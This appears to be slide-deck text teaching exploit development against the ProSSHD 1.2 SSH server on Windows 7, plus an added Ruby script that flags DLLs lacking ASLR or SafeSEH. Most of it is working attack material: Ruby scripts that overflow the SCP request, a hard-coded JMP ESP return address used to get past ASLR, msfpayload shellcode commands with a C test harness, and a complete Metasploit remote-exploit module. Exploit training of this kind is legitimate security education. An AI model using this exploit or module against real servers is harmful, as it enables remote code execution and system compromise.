3. Install ProSSHD in vmware
• Set up W7 vmware client, host only mode.
• Determine vmware client IP.
• Ping vmware client from host system.
• Install Demo ProSSHD inside vm, run it.
4. Exploit Development Process
• Crash Program in Debugger
• Control EIP (next instruction)
• Determine Offset of Overwrite to EIP
• Determine Opcode to return to (new EIP)
• Determine Space Constraints
• Select and Test Shellcode
• Build Exploit Sandwich
• Determine Bad Characters
5. Immunity Debugger
• Fork from OllyDbg
• Still looks and feels like OllyDbg
• Adds a Python Command Shell
• Allows for more automation
• pvefindaddr is a great plugin tool for exploit development! http://corelan.be
• Note: there was a problem with 1.74
• Current version is 1.80
6. Save Snapshot, Attach Debugger
• In Vmware, save snapshot (prior to sending)
• Send Exploit, with Sleep(15) before send
• File->Attach->wsshd.exe (may need to sort)
• In debugger, hit F9 to continue process
7. Crash the ProSSHD Server
• From host, crash remote server, control EIP
#prosshd1.rb
%w{rubygems net/ssh net/scp}.each { |x| require x }
username = 'test1' # need to set this up on the test victim (os account)
password = 'test1' # need to set this up on the test victim machine
host = '10.10.10.143'
port = 22
# use A's to overwrite eip
get_request = "\x41" * 516
# lets do it…
Net::SSH.start( host, username, :port => port, :password => password) do |ssh|
  sleep(15) # gives us time to attach to wsshd.exe
  ssh.scp.download!( get_request, "foo.txt") # 2 params: remote file, local file
end
• Run exploit with ruby prosshd1.rb
• Attach debugger to wsshd.exe, after it loads, Hit F9 twice
8. Determine the Offset(s)
• Revert VM, then use Pattern_Create
#prosshd2.rb
%w{rubygems net/ssh net/scp}.each { |x| require x }
username = 'test1' # need to set this up on the test victim (os account)
password = 'test1' # need to set this up on the test victim machine
host = '10.10.10.143'
port = 22
# cyclic pattern (pattern_create 500) instead of A's, so the bytes landing in eip give the offset
get_request = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq"
# lets do it…
Net::SSH.start( host, username, :port => port, :password => password) do |ssh|
  sleep(15) # gives us time to attach to wsshd.exe
  ssh.scp.download!( get_request, "foo.txt") # 2 params: remote file, local file
end
• Run exploit with ruby prosshd2.rb
11. Determine Op-Codes to Return to
• Determine the Control Vector, we could:
– JMP ESP
– RETN
• We choose JMP ESP
• Could use msfpescan on ntdll.dll
12. Determine Op-Codes to Return to
• Problem: Vista and beyond protect NTDLL.DLL with ASLR
• Need to find a non-ASLR module
• This is the best way to bypass ASLR
• pvefindaddr is the tool of choice
• Run with !pvefindaddr j -r esp -n in ImmDbg
• Results in file j.txt:
• C:\Users\[your name here]\AppData\Local\VirtualStore\Program Files\Immunity Inc\Immunity Debugger\
13. Determine Op-Code Address
==================================================================
pvefindaddr v1.32 corelanc0d3r - http://www.corelan.be:8800
-----Loaded modules ----------------------------------------------
Fixup | Base | Top | Size | SafeSEH | ASLR | NXCompat | Modulename & Path
----------------------------------------------------------------
NO | 0x7C340000 | 0x7C396000 | 0x00056000 | yes | NO | NO | MSVCR71.dll : C:\Users\Public\Program Files\Lab-NC\ProSSHD\MSVCR71.dll
yes | 0x76210000 | 0x762E4000 | 0x000D4000 | yes | yes | yes | kernel32.dll : C:\Windows\system32\kernel32.dll
yes | 0x77A50000 | 0x77B8C000 | 0x0013C000 | yes | yes | yes | ntdll.dll : C:\Windows\SYSTEM32\ntdll.dll
<truncated for brevity>
NO | 0x00400000 | 0x00457000 | 0x00057000 | yes | NO | NO | wsshd.exe : C:\Users\Public\Program Files\Lab-NC\ProSSHD\wsshd.exe
<truncated for brevity>
Found push esp - ret at 0x7C345C30 [msvcr71.dll] - [Ascii printable] {PAGE_EXECUTE_READ} [SafeSEH: Yes - ASLR: ** No (Probably not) **] [Fixup: ** NO **] - C:\Users\Public\Program Files\Lab-NC\ProSSHD\MSVCR71.dll
<truncated for brevity>
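As an added example, not part of this deck or of pvefindaddr, a small Ruby parser for the module table above: it reports every loaded module missing ASLR, SafeSEH, NXCompat or Fixup, which is the same audit a defender runs to spot the third-party DLL (here MSVCR71.dll) that undoes the OS's ASLR and should be rebuilt with /DYNAMICBASE, /SAFESEH and /NXCOMPAT. The table in PVE_MODULES is a constructed excerpt in the format shown.

```ruby
# Added example (not from the original deck): parse the "Loaded modules"
# table that pvefindaddr writes and report modules lacking a mitigation.
# PVE_MODULES is a constructed excerpt in the table format shown above.
PVE_MODULES = <<~TXT
  Fixup | Base | Top | Size | SafeSEH | ASLR | NXCompat | Modulename & Path
  ----------------------------------------------------------------
  NO | 0x7C340000 | 0x7C396000 | 0x00056000 | yes | NO | NO | MSVCR71.dll : C:\\Users\\Public\\Program Files\\Lab-NC\\ProSSHD\\MSVCR71.dll
  yes | 0x76210000 | 0x762E4000 | 0x000D4000 | yes | yes | yes | kernel32.dll : C:\\Windows\\system32\\kernel32.dll
  yes | 0x77A50000 | 0x77B8C000 | 0x0013C000 | yes | yes | yes | ntdll.dll : C:\\Windows\\SYSTEM32\\ntdll.dll
  NO | 0x00400000 | 0x00457000 | 0x00057000 | yes | NO | NO | wsshd.exe : C:\\Users\\Public\\Program Files\\Lab-NC\\ProSSHD\\wsshd.exe
TXT

# One data row of the table; the yes/NO columns become booleans.
ModuleRow = Struct.new(:name, :path, :base, :size, :fixup, :safeseh, :aslr, :nxcompat)

def parse_pvefindaddr(text)
  text.each_line.map do |line|
    cols = line.strip.split('|').map(&:strip)
    # Data rows have 8 columns and a hex base address; headers and rulers do not.
    next unless cols.size == 8 && cols[1] =~ /\A0x\h+\z/
    name, path = cols[7].split(' : ', 2)
    flags = cols.values_at(0, 4, 5, 6).map { |v| v.casecmp?('yes') }
    ModuleRow.new(name, path, cols[1].hex, cols[3].hex, *flags)
  end.compact
end

# Map of module name => mitigations it lacks. A module loaded without ASLR
# (or one that cannot be relocated, Fixup = NO) sits at a fixed address and
# is exactly the module slide 12 warns about; for a defender it is the DLL
# to rebuild with /DYNAMICBASE, /SAFESEH and /NXCOMPAT.
def weak_modules(text)
  parse_pvefindaddr(text).each_with_object({}) do |m, out|
    missing = []
    missing << 'ASLR'     unless m.aslr
    missing << 'SafeSEH'  unless m.safeseh
    missing << 'NXCompat' unless m.nxcompat
    missing << 'Fixup'    unless m.fixup
    out[m.name] = missing unless missing.empty?
  end
end

if __FILE__ == $0
  weak_modules(PVE_MODULES).each { |n, miss| puts "#{n}: missing #{miss.join(', ')}" }
end
```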
14. Find Space Constraints
• Crash with 2000 A's, calculate depth of buffer
#prosshd3.rb …truncated for brevity…
get_request = "\x41" * 492 + "\x42\x42\x42\x42" + "\x41" * 2000
• Run, Attach, Crash, inspect stack for buffer size
0x0012f758 - 0x0012ef88 = 2000
So we can fit 2000 bytes of shellcode into the buffer
15. Select and Test Shellcode
• Generate your shellcode (switching to C)
$ msfpayload windows/exec cmd=calc.exe R | msfencode -b '\x00\x0a' -e x86/shikata_ga_nai -t c > sc.txt
• Take that shellcode and copy paste into the following harness
//shellcode.c
char shellcode[] = //copy paste from above
"\x31\xc0\x31... your shellcode goes here";
int main() {                 //main function
  int *ret;                  //ret pointer for saved ret
  ret = (int *)&ret + 2;     //set ret to point to the saved return
  (*ret) = (int)shellcode;   //change the saved ret to addr of shellcode
}
16. Select and Test Shellcode
Notice: we disabled DEP (/NXCOMPAT)… it does not matter here, as our vulnerable program is not linked with /NXCOMPAT by default.
18. Test Exploit with Debugger
• Run with ruby prosshd4.rb
• Hit F9 twice to hit breakpoint
• Hit F9 to Continue; if it crashes, then bad character.
19. Find Bad Characters
• Revert VM, resend exploit, step through
• Tip 1: right click on halted instruction, follow in dump…
Shellcode is mangled… why? Bad char \x0a
21. Metasploit Decoders
• Require space on the stack to decode
• Modules use stackadjustment parameter
• You may want to add 16 bytes of NOP to beginning of payload to be safe.
22. Success!
• Revert VM to running state
• Launch Exploit with new shellcode
• Remove \xcc, replace with \x90, fire off exploit
• P0wn3d!!!!! Where do you want to go today!
23. Automating
• Metasploit as you have seen is an excellent tool for both exploit development and execution.
• You should look at existing modules, best way to learn techniques.
• There is no ProSSHD module :(
• We will create one and automate our attack!
25. Header
##
# $Id: freesshd_key_exchange.rb 9262 2010-05-09 17:45:00Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'
%w{rubygems net/ssh net/scp}.each { |x| require x }

class Metasploit3 < Msf::Exploit::Remote
  Rank = AverageRanking

  include Msf::Exploit::Remote::Tcp
26. Initialize Section
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'ProSSHD 1.2.x SCP-GET Buffer Overflow',
      'Description'    => %q{
          This module exploits a simple stack buffer overflow in ProSSHD 1.2.
          This flaw is due to a buffer overflow error when handling a specially
          crafted scp get request from an SSH client.
          **Based on original Exploit by S2 Crew [Hungary]
      },
      'Author'         => 'AAH',
      'License'        => MSF_LICENSE,
      'Version'        => '$Revision: 10000 $',
      'References'     => [],
      'DefaultOptions' => {'EXITFUNC' => 'process',},
      'Payload'        => {'Space' => 1000,
                           'BadChars' => "\x00\x09\x0a\x20\x21",
                           'StackAdjustment' => -3500,},
      'Platform'       => 'win',
      'Targets'        => [[ 'Windows 7', { 'Ret' => 0x7c345c30 } ],],
      'Privileged'     => true,
      'DisclosureDate' => 'March 3, 2010',
      'DefaultTarget'  => 0))
    register_options([
      OptString.new('USERNAME', [ true, 'The username to authenticate as' ]),
      OptString.new('PASSWORD', [ true, 'The password for the specified username' ]),
      Opt::RPORT(22)], self.class)
  end

27. Exploit Section
  def exploit

    get_request = "\x41" * 492 +
      [target.ret].pack('V') +
      "\x90" * 1000 +
      payload.encoded # shellcode 8)

    print_status("Trying to connect to #{datastore['RHOST']}...")

    # lets do it...
    Net::SSH.start( datastore['RHOST'], datastore['USERNAME'], :password => datastore['PASSWORD']) do |ssh|
      #sleep(15) # gives us time to attach to wsshd.exe
      print_status("Sending sploit to #{datastore['RHOST']}...")
      ssh.scp.download!( get_request, "foo.txt") # 2 params: remote file, local file
    end
    handler
  end
end

28. Setup
• Next, install the following rubygems
• Have to run CygShell as Administrator (on older MSF)
• Right click on it in start menu, select run as Administrator